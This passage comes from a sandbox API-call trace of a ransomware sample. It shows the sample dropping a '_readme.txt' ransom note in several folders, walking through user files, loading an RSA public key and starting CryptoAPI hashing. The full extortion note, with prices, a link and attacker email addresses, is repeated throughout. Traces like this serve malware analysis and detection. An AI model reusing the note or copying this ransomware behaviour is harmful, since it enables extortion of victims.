(hLibModule=0x761b0000) returned 1 [0210.063] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0210.063] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0210.063] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.063] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.064] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.064] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.064] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0210.064] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.064] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.064] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.064] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.064] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.065] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.065] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.065] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.065] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0210.065] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0210.065] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.065] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.066] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.066] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.066] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0210.066] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.066] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.066] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.066] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.067] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.067] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.067] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.067] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0210.067] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0210.067] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2cb6dd40, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2cb6dd40, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0210.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0210.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0210.068] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.069] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.069] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.069] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.069] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.070] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.070] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9d26360, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9d26360, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0210.070] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.070] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.070] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0210.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0210.071] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=1178) returned 1 [0210.071] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0210.074] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.075] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0210.077] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x49a, lpOverlapped=0x0) returned 1 [0210.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0210.077] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0210.078] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0210.078] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0210.078] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0210.078] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x11) returned 0x3272828 [0210.078] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x3272828, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x3272828, pdwDataLen=0x397fa54) returned 1 [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.079] SetLastError (dwErrCode=0x0) [0210.079] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] 